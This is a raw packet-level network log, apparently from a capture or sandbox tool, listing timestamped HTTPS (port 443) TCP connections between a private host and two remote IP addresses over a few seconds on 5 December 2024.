                                                                                                              Dec 5, 2024 10:38:23.346502066 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.346507072 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.346525908 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.346541882 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.346569061 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.468720913 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.468765020 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.468853951 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.468904972 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.468924999 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.468965054 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.498200893 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.498224974 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.498332977 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.498393059 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.498686075 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.527885914 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.527913094 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.527972937 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.528023958 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.528043985 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.528078079 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.617645025 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.617731094 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.617789984 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.617939949 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.617965937 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.617979050 CET49749443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.617985010 CET4434974913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.619575977 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.619638920 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.619771957 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.619901896 CET49750443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.619914055 CET4434975013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.620884895 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.620918036 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.621011972 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.621157885 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.621172905 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.621958017 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.621994972 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.622133970 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.622275114 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.622288942 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624162912 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624231100 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624286890 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.624419928 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.624424934 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624434948 CET49751443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.624439001 CET4434975113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624681950 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624753952 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624842882 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.624962091 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.624984980 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.624996901 CET49752443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.625003099 CET4434975213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.626537085 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626549006 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.626615047 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626678944 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626689911 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.626753092 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626818895 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626828909 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.626883030 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:23.626897097 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.635040998 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.635068893 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.635118961 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.635133028 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.635166883 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.635183096 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.658132076 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.658154011 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.658201933 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.658212900 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.658238888 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.658253908 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.675333023 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.675354004 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.675410986 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.675422907 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.675463915 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.694772959 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.694792986 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.694839954 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.694850922 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.694885969 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.712821007 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.712842941 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.712902069 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.712917089 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.712951899 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.732311964 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.732332945 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.732379913 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.732415915 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.732429028 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.732575893 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.753348112 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.753379107 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.753415108 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.753443003 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.753456116 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.753483057 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.830113888 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.830144882 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.830184937 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.830205917 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.830236912 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.830255032 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.845453978 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.845484972 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.845535040 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.845556974 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.845588923 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.845608950 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.856944084 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.856976986 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.857004881 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.857021093 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.857055902 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.857069016 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.869061947 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.869107008 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.869143963 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.869167089 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.869203091 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.869226933 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.879693031 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.879724979 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.879771948 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.879800081 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.879823923 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.879856110 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.886280060 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.886296034 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.886344910 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.886374950 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.886415005 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.893188000 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.893203020 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.893258095 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.893281937 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.893316984 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.898099899 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.898114920 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.898155928 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.898176908 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:23.898201942 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:23.898220062 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.022203922 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.022239923 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.022289991 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.022334099 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.022350073 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.022392988 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.027394056 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.027415037 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.027466059 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.027496099 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.027512074 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.027537107 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.032216072 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.032234907 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.032299042 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.032331944 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.032349110 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.032392979 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.038610935 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.038628101 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.038712978 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.038744926 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.038791895 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.044955015 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.044971943 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.045042038 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.045074940 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.045140028 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.049969912 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.050010920 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.050041914 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.050071001 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.050096035 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.050177097 CET4434974868.66.226.116192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.050228119 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.050745964 CET49748443192.168.2.668.66.226.116
                                                                                                              Dec 5, 2024 10:38:24.802620888 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.803143024 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:24.803163052 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:24.803634882 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:24.803642035 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.306607962 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.306689978 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.306742907 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.309828043 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.309853077 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.309866905 CET49755443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.309873104 CET4434975513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.313234091 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.313266039 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.313550949 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.313673019 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.313700914 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.429372072 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.429532051 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.430056095 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.430089951 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.430198908 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.430238962 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.430526018 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.430531979 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.430675983 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.430682898 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.432897091 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.433228970 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.433240891 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.433250904 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.433492899 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.433509111 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.433810949 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.433815956 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.433952093 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.433958054 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.864496946 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.864607096 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.864660025 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.864979982 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.864996910 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.865008116 CET49756443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.865014076 CET4434975613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.865151882 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.865240097 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.865289927 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.865801096 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.865827084 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.865837097 CET49757443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.865843058 CET4434975713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.869175911 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.869220972 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.869283915 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.870316029 CET49764443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.870346069 CET4434976413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.870454073 CET49764443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.870578051 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.870594978 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.870712996 CET49764443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.870722055 CET4434976413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.873943090 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.874011040 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.874062061 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.874260902 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.874268055 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.874310970 CET49759443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.874315977 CET4434975913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.875396013 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.875457048 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.875520945 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.875638008 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.875644922 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.875654936 CET49758443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.875658035 CET4434975813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.877866983 CET49765443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.877912045 CET4434976513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.877998114 CET49765443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.878160954 CET49765443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.878176928 CET4434976513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.879220009 CET49766443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.879237890 CET4434976613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:25.879340887 CET49766443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.879497051 CET49766443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:25.879508972 CET4434976613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.143424988 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.144030094 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.144052029 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.144491911 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.144498110 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.580741882 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.580836058 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.580936909 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.581135035 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.581154108 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.581187010 CET49762443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.581193924 CET4434976213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.584332943 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.584491968 CET49768443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.584553003 CET4434976813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.584626913 CET49768443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.584964991 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.584996939 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.584999084 CET49768443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.585016966 CET4434976813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.585490942 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.585498095 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.588859081 CET4434976413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.589282036 CET49764443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.589293957 CET4434976413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.589698076 CET49764443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.589706898 CET4434976413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.593380928 CET4434976613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.593770981 CET49766443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.593786955 CET4434976613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.594111919 CET49766443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.594119072 CET4434976613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.594738007 CET4434976513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.595109940 CET49765443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.595120907 CET4434976513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:27.595487118 CET49765443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:27.595493078 CET4434976513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.019079924 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.019156933 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.019236088 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:28.019444942 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:28.019463062 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.019478083 CET49763443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:28.019484997 CET4434976313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.022460938 CET49769443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:28.022514105 CET4434976913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:28.022691965 CET49769443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:28.022902966 CET49769443192.168.2.613.107.246.63
